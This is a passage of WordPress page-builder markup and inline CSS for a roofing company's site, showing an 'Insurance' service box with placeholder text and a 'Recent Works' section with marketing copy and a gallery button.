30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d3c03c5f-5606-4310-98a4-30d73f9945ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"bbb98fc7-3a1c-40ca-8905-157ad2df8e24\"} -->\n<style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6e721bfc-c727-4b32-a621-9a1dcc0e501c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-6e721bfc-c727-4b32-a621-9a1dcc0e501c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"994f6e51-2a17-435a-8b2f-9235a8bb8702\"} -->\n<style type=\"text/css\"> .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-994f6e51-2a17-435a-8b2f-9235a8bb8702 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"2ac6f6b9-bced-48f5-9f60-eae03e300214\"} -->\n<style type=\"text/css\"> .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2ac6f6b9-bced-48f5-9f60-eae03e300214\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"47168312-0ca1-4133-bab7-40d5c2e35f72\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\"} -->\n<style type=\"text/css\"> .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider 